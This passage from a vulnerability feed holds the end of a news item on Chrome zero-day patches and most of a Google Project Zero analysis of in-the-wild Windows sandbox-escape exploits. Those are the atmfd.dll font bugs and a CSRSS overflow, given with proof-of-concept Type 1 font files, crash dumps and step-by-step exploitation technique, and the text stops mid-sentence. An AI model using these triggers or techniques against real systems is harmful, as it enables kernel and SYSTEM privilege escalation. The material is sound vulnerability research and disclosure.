the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly there Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as (CVE-2020-16011).\n\nThis week\u2019s Chrome updates come on the heels of zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google effecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in that just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "modified": "2020-11-03T17:23:23", "published": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2021-01-13T07:23:57", "bulletinFamily": "info", "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "description": "This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Mateusz Jurczyk and Sergei Glazunov, Project Zero\n\nIn this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.\n\n## 1\\. Font vulnerabilities on Windows \u2264 8.1 (CVE-2020-0938, CVE-2020-1020)\n\n### Background\n\nThe Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called \"Multiple Master Fonts\", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the [blend operator](<https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html>)).\n\nOn Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. \"CVE-2020-1027\"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome [uses](<https://bugs.chromium.org/p/chromium/issues/detail?id=365160>), so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).\n\nNevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.\n\n### Font bug #1\n\nThe first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The \"VToHOrigin\" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[2];\n\nFixed16_16 values[2];\n\nfor (int i = 0; i < g_font->numMasters; i++) {\n\nptrs[i] = &g_font->SomeArray[arg->SomeField + i];\n\n}\n\nfor (int i = 0; i < 2; i++) {\n\nint values_read = GetOpenFixedArray(values, g_font->numMasters);\n\nif (values_read != g_font->numMasters) {\n\nreturn -8;\n\n}\n\nfor (int num = 0; num < g_font->numMasters; num++) {\n\nptrs[num][i] = values[num];\n\n}\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nIn summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0\u201316, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:\n\n... \n \n--- \n \nRSP + 0x30\n\n| \n\nptrs[0] \n \nRSP + 0x38\n\n| \n\nptrs[1] \n \nRSP + 0x40\n\n| \n\nsaved RDI \n \nRSP + 0x48\n\n| \n\nreturn address \n \nRSP + 0x50\n\n| \n\nvalues[0 .. 1] \n \nRSP + 0x58\n\n| \n\nsaved RBX \n \nRSP + 0x60\n\n| \n\nsaved RSI \n \n... \n \nThe green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.\n\nAfter the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.\n\nA proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 \\+ type1 utilities as part of [AFDKO](<https://github.com/adobe-type-tools/afdko/>)) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/WeightVector [0 0 0 0 0] def\n\n/Private begin\n\n/Blend begin\n\n/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nThe first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000001, value 0 = read operation, 1 = write operation.\n\nArg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141\n\nrdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000\n\nrip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000\n\nr8=0000000000000000 r9=000000000000000e r10=0000000000000000\n\nr11=00000000fffffffb r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei pl nz na po cy\n\nATMFD+0x22144:\n\nfffff96000a86144 890499 mov dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????\n\nResetting default scope \n \n--- \n \n### Font bug #2\n\nThe second issue was found in the processing of the /BlendDesignPositions object, which is defined in the [Adobe Font Metrics File Format Specification](<https://www.adobe.com/content/dam/acom/en/devnet/font/pdfs/5004.AFM_Spec.pdf>) document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\nSetNumMasters(num_master);\n\nfor (int i = 0; i < num_master; i++) {\n\nprocs->BlendDesignPositions(i, &values[i]);\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nThe bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.\n\nTo trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]\n\n/Private begin\n\n/Blend begin\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nIn the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000008, value 0 = read operation, 1 = write operation.\n\nArg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000\n\nrdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000\n\nrip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002\n\nr8=0000000000000618 r9=0000000000000024 r10=fffff90000002000\n\nr11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei ng nz na po nc\n\nffffffff`41414141 ?? ???\n\nResetting default scope \n \n--- \n \n### Exploitation\n\nAccording to our analysis, the font exploit supported the following Windows versions:\n\n * Windows 8.1 (NT 6.3)\n * Windows 8 (NT 6.2)\n * Windows 7 (NT 6.1)\n * Windows Vista (NT 6.0)\n\nWhen run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed [here](<https://googleprojectzero.blogspot.com/2015/08/one-font-vulnerability-to-rule-them-all_13.html>)), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.\n\nThings get more complicated on Windows 8.1, where the session space is no longer executable:\n\n0: kd> !pte fffff90000000000\n\nPXE at FFFFF6FB7DBEDF90 \n\ncontains 0000000115879863 \n\npfn 115879 ---DA--KWEV \n\nPPE at FFFFF6FB7DBF2000\n\ncontains 0000000115878863\n\npfn 115878 ---DA--KWEV\n\nPDE at FFFFF6FB7E400000\n\ncontains 0000000115877863\n\npfn 115877 ---DA--KWEV\n\nPTE at FFFFF6FC80000000\n\ncontains 8000000115976863\n\npfn 115976 ---DA--KW-V \n \n--- \n \nAs a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address \u2013 the [shared user data](<https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm>) region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did \u2013 it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.\n\nOnce kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.\n\n### The fixes\n\nWe reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.\n\nSince both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[16];\n\nFixed16_16 values[16];\n\nif (g_font->numMasters > 0x10) {\n\nreturn -4;\n\n}\n\n[...]\n\n} \n \n--- \n \nIn the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nif (num_master >= 16) {\n\nreturn -4;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\n[...]\n\n} \n \n--- \n \n## 2\\. CSRSS issue on Windows 10 (CVE-2020-1027)\n\n### Background\n\nThe Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.\n\ncsrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can\u2019t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.\n\nThe communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:\n\nNTSTATUS CsrClientCallServer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nLONG DataLength); \n \n--- \n \nThe ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.\n\nThe reader can refer to [this series of posts](<https://j00ru.vexillium.org/2010/07/windows-csrss-write-up-the-basics/>) for a detailed description of the CSRSS internals.\n\nOne of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.MySampleApp\"\n\nversion=\"1.0.0.0\" processorArchitecture=\"x86\"/>\n\n<dependency>\n\n<dependentAssembly>\n\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Tools.MyPrivateDll\"\n\nversion=\"2.5.0.0\" processorArchitecture=\"x86\"/>\n\n</dependentAssembly>\n\n</dependency>\n\n</assembly> \n \n--- \n \n### The bug\n\nThe vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.\n\nThe relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:\n\ntypedef struct _UNICODE_STRING {\n\nUSHORT Length;\n\nUSHORT MaximumLength;\n\nPWSTR Buffer;\n\n} UNICODE_STRING, *PUNICODE_STRING; \n \n--- \n \nBaseSrvSxsCreateActivationContext starts with validating the string parameters:\n\nfor (i = 0; i < 6; ++i) {\n\nif (StringField = StringFields[i]) {\n\nLength = StringField->Length;\n\nif (Length && !StringField->Buffer ||\n\nLength > StringField->MaximumLength || Length & 1)\n\nreturn 0xC000000D;\n\nif (StringField->Buffer) {\n\nif (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,\n\nLength + 2, 1)) {\n\nDbgPrintEx(0x33, 0,\n\n\"SXS: Validation of message buffer 0x%lx failed.\\n\"\n\n\" Message:%p\\n\"\n\n\" String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\\n\",\n\ni, ApiMessage, StringField, StringField->Length,\n\nStringField->MaximumLength, StringField->Buffer);\n\nreturn 0xC000000D;\n\n}\n\nCharCount = StringField->Length >> 1;\n\nif (StringField->Buffer[CharCount] &&\n\nStringField->Buffer[CharCount - 1])\n\nreturn 0xC000000D;\n\n}\n\n}\n\n} \n \n--- \n \nCsrValidateMessageBuffer is declared as follows:\n\nBOOLEAN CsrValidateMessageBuffer(\n\nPCSR_API_MSG ApiMessage,\n\nPVOID* Buffer,\n\nULONG ElementCount,\n\nULONG ElementSize); \n \n--- \n \nThis function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn\u2019t cause an integer overflow, and 3) it doesn\u2019t go past the end of the capture buffer.\n\nAs the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we\u2019ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:\n\nsxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity\n\nsxs!CNodeFactory::CreateNode\n\nsxs!XMLParser::Run\n\nsxs!SxspIncorporateAssembly\n\nsxs!SxspCloseManifestGraph\n\nsxs!SxsGenerateActivationContext\n\nsxssrv!BaseSrvSxsCreateActivationContextFromStructEx\n\nsxssrv!BaseSrvSxsCreateActivationContext\n\nWhen BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName\u2019s buffer and the unaudited MaximumLength value as the buffer size:\n\nBufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;\n\nif (BufferCapacity) {\n\nGenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;\n\nGenActCtxParams.ApplicationNameBuffer =\n\nCreateCtxParams->ApplicationName.Buffer;\n\n} else {\n\nGenActCtxParams.ApplicationNameCapacity = 60;\n\nStringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);\n\nif (!StringBuffer) {\n\nStatus = 0xC0000017;\n\ngoto error;\n\n}\n\nGenActCtxParams.ApplicationNameBuffer = StringBuffer;\n\n} \n \n--- \n \nThen sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:\n\nContext = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);\n\nif (Context) {\n\nContext = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);\n\n} else {\n\nFusionpTraceAllocFailure(v14);\n\nSetLastError(0xE);\n\ngoto error;\n\n}\n\nif (GenActCtxParams->ApplicationNameBuffer &&\n\nGenActCtxParams->ApplicationNameCapacity) {\n\nContext->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;\n\nContext->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;\n\n} \n \n--- \n \nUltimately, sxs!CNodeFactory::\n\nXMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:\n\nIdentityNameBuffer = 0;\n\nIdentityNameLength = 0;\n\nSetLastError(0);\n\nif (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,\n\n&IdentityNameBuffer,\n\n&IdentityNameLength)) {\n\nCallSiteInfo = off_16506FA20;\n\ngoto error;\n\n}\n\nif (IdentityNameLength &&\n\nIdentityNameLength < Context->ApplicationNameCapacity) {\n\nmemcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,\n\n2 * IdentityNameLength + 2);\n\nContext->ApplicationNameLength = IdentityNameLength;\n\n} else {\n\n*Context->ApplicationNameBuffer = 0;\n\nContext->ApplicationNameLength = 0;\n\n} \n \n--- \n \nThe source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.\n\n### Exploitation\n\nEven though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.\n\nAs a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there\u2019s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it\u2019s quite difficult to reliably make a \u201cuseful\u201d allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.\n\nThe logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:\n\n * Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.\n\n * csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the \u201clocal\u201d and \u201cremote\u201d addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.\n\nThe exploit also has to bypass another security feature, Microsoft\u2019s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG\u2019s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:\n\n1\\. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN=\"BB...BB\u201d. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.\n\n2\\. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.\n\n3\\. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:\n\ntypedef struct _LDR_MODULE {\n\nLIST_ENTRY InLoadOrderModuleList;\n\nLIST_ENTRY InMemoryOrderModuleList;\n\nLIST_ENTRY InInitializationOrderModuleList;\n\nPVOID BaseAddress;\n\nPVOID EntryPoint;\n\nULONG SizeOfImage;\n\nUNICODE_STRING FullDllName;\n\nUNICODE_STRING BaseDllName;\n\nULONG Flags;\n\nSHORT LoadCount;\n\nSHORT TlsIndex;\n\nLIST_ENTRY HashTableEntry;\n\nULONG TimeDateStamp;\n\n} LDR_MODULE, *PLDR_MODULE; \n \n--- \n \nWhen a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can\u2019t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.\n\n4\\. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.\n\n5\\. Restore the module list. Once the execution reaches the fake module list processing, it\u2019s important to restore PEB_LDR_DATA\u2019s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.\n\n6\\. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.\n\n7\\. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the 